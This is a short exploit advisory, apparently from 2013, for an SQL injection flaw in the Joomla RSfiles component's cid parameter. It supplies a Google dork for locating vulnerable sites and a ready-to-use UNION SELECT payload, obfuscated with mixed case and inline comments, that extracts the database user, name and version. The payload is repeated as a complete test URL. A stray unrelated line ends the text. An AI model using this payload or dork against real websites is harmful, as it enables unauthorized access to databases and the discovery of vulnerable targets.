******************************************************************************* # Title :Joomla Component RSfiles <= (cid) SQL injection Vulnerability # Author:ByEge # Contact :http://byege.blogspot.com # Date:18.03.2013 # S.Page:http://www.rsjoomla.com # Dork:inurl:index.php?option=com_rsfiles # DorkEx:http://www.google.com.tr/#hl=tr&sclient=psy-ab&q=inurl:index.php?option=com_rsfiles Vulnerability : ?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid=1/**/aNd/**/1=0/**/uNioN++sElecT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version())-- [[SQL Injection Test]]] http://server/?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid=1/**/aNd/**/1=0/**/uNioN++sElecT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version())-- ********************************* # Turkey.
体验盒子
